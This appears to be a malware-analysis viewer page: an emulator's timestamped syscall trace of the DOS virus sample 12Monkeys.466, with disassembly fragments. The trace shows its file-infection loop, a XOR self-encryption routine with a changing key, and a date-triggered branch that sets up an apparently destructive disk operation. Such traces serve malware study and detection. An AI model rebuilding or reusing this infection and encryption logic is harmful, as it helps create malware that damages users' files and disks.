Sample viewer

vx.netlux.org/Virus.DOS.VCC.12Monkeys.466

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:54:53.791431469Z	26	PC: 13e91 \| Set disk transfer address
2018-12-17T22:54:53.793288965Z	53	PC: 13e97 \| Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:54:53.795148178Z	53	PC: 13ea4 \| Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:54:53.796426439Z	44	PC: 13eaf \| Get time 0x13eaf: cmp dl, 0xd 0x13eb2: jg 0x13eb8 0x13eb4: mov al, 0x82 0x13eb6: out 0x21, al 0x13eb8: mov ah, 0x2c 0x13eba: int 0x21 0x13ebc: cmp dl, 0x32 0x13ebf: jg 0x13f12 0x13ec1: mov ah, 9 0x13ec3: lea dx, word ptr [bp + 0x190] 0x13ec7: int 0x21 0x13ec9: mov ah, 0 0x13ecb: int 0x16 0x13ecd: jmp 0x13f12 0x13ecf: nop 0x13ed0: xor word ptr [bp + si], si 0x13ed2: and byte ptr [di + 0x6f], cl 0x13ed5: outsb dx, byte ptr [si] 0x13ed6: imul sp, word ptr [di + 0x79], 0x73 0x13eda: and byte ptr [bp + di + 0x20], al
2018-12-17T22:54:53.798806787Z	44	PC: 13ebc \| Get time 0x13ebc: cmp dl, 0x32 0x13ebf: jg 0x13f12 0x13ec1: mov ah, 9 0x13ec3: lea dx, word ptr [bp + 0x190] 0x13ec7: int 0x21 0x13ec9: mov ah, 0 0x13ecb: int 0x16 0x13ecd: jmp 0x13f12 0x13ecf: nop 0x13ed0: xor word ptr [bp + si], si 0x13ed2: and byte ptr [di + 0x6f], cl 0x13ed5: outsb dx, byte ptr [si] 0x13ed6: imul sp, word ptr [di + 0x79], 0x73 0x13eda: and byte ptr [bp + di + 0x20], al 0x13edd: push si 0x13ede: imul si, word ptr [bp + si + 0x75], 0x2073 0x13ee3: dec cx 0x13ee4: outsb dx, byte ptr [si] 0x13ee5: arpl word ptr gs:[si + 0x65], si 0x13eea: and word ptr fs:[si], bp
2018-12-17T22:54:53.801453199Z	78	PC: 13f2b \| Find first file
2018-12-17T22:54:53.808136395Z	61	PC: 13f3b \| Open file (Filename = '!""��S��')
2018-12-17T22:54:53.815412234Z	63	PC: 13f49 \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:53.831883393Z	66	PC: 13f58 \| Move file pointer
2018-12-17T22:54:53.833640038Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1d2 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x194 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x27 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2ce] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:54:53.836406172Z	64	PC: 13e6b \| Write file or device (Write 466 bytes on handle 5)
2018-12-17T22:54:53.853337116Z	66	PC: 13f6a \| Move file pointer
2018-12-17T22:54:53.855156197Z	64	PC: 13f75 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:53.863017799Z	62	PC: 13f7e \| Close file
2018-12-17T22:54:53.873862913Z	79	PC: 13f2b \| Find next file
2018-12-17T22:54:53.877544415Z	61	PC: 13f3b \| Open file (Filename = '!""��S��')
2018-12-17T22:54:53.885349221Z	63	PC: 13f49 \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:53.893531339Z	66	PC: 13f58 \| Move file pointer
2018-12-17T22:54:53.895242253Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1d2 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x194 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x3f 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2ce] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:54:53.897883957Z	64	PC: 13e6b \| Write file or device (Write 466 bytes on handle 5)
2018-12-17T22:54:53.901782273Z	66	PC: 13f6a \| Move file pointer
2018-12-17T22:54:53.904094917Z	64	PC: 13f75 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:53.907394315Z	62	PC: 13f7e \| Close file
2018-12-17T22:54:53.916229253Z	79	PC: 13f2b \| Find next file
2018-12-17T22:54:53.919460802Z	61	PC: 13f3b \| Open file (Filename = '!""��S��')
2018-12-17T22:54:53.926669369Z	63	PC: 13f49 \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:53.933695973Z	66	PC: 13f58 \| Move file pointer
2018-12-17T22:54:53.94243575Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1d2 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x194 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x45 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2ce] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:54:53.945213209Z	64	PC: 13e6b \| Write file or device (Write 466 bytes on handle 5)
2018-12-17T22:54:53.954378621Z	66	PC: 13f6a \| Move file pointer
2018-12-17T22:54:53.956525997Z	64	PC: 13f75 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:53.964296074Z	62	PC: 13f7e \| Close file
2018-12-17T22:54:53.974414339Z	79	PC: 13f2b \| Find next file
2018-12-17T22:54:53.978757938Z	61	PC: 13f3b \| Open file (Filename = '!""��S��')
2018-12-17T22:54:53.986732047Z	63	PC: 13f49 \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:53.994297594Z	66	PC: 13f58 \| Move file pointer
2018-12-17T22:54:53.997662842Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1d2 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x194 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x4a 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2ce] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:54:54.000868569Z	64	PC: 13e6b \| Write file or device (Write 466 bytes on handle 5)
2018-12-17T22:54:54.004522159Z	66	PC: 13f6a \| Move file pointer
2018-12-17T22:54:54.007278273Z	64	PC: 13f75 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:54.011164852Z	62	PC: 13f7e \| Close file
2018-12-17T22:54:54.022704894Z	79	PC: 13f2b \| Find next file
2018-12-17T22:54:54.026176216Z	61	PC: 13f3b \| Open file (Filename = '!""��S��')
2018-12-17T22:54:54.03446923Z	63	PC: 13f49 \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:54.045571418Z	66	PC: 13f58 \| Move file pointer
2018-12-17T22:54:54.062467715Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1d2 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x194 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x4a 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2ce] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:54:54.066743804Z	64	PC: 13e6b \| Write file or device (Write 466 bytes on handle 5)
2018-12-17T22:54:54.070296615Z	66	PC: 13f6a \| Move file pointer
2018-12-17T22:54:54.072233517Z	64	PC: 13f75 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:54.076985796Z	62	PC: 13f7e \| Close file
2018-12-17T22:54:54.085706657Z	42	PC: 13f93 \| Get date 0x13f93: cmp dh, 0x11 0x13f96: jl 0x13fb7 0x13f98: cmp dl, 8 0x13f9b: jl 0x13fb7 0x13f9d: mov ah, 0x19 0x13f9f: int 0x21 0x13fa1: mov cx, 0x25 0x13fa4: mov dx, 0 0x13fa7: lea bx, word ptr [bp + 0x190] 0x13fab: push ds 0x13fac: pop es 0x13fad: mov byte ptr [bp + 0x273], 0x26 0x13fb2: int 0x19 0x13fb4: add sp, 2 0x13fb7: mov ah, 0x1a 0x13fb9: mov dx, 0x80 0x13fbc: int 0x21 0x13fbe: mov cx, 0xf 0x13fc1: push cx 0x13fc2: mov dx, 0x140
2018-12-17T22:54:54.088515996Z	26	PC: 13fbe \| Set disk transfer address